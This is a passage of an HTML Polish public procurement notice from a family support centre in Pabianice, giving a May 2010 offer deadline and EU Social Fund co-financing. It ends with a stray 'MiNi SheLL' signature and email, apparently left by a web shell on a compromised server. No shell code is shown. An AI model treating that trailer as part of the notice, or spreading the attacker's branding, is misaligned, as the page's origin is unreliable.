ul. Traugutta 6a
95-200 PABIANICE
woj. łódzkie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.05.2010 godzina 09:00, miejsce: Powiatowe Centrum Pomocy Rodzinie w Pabianicach
ul. Traugutta 6a
95-200 PABIANICE
woj. łódzkie
sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie współfinansowane ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com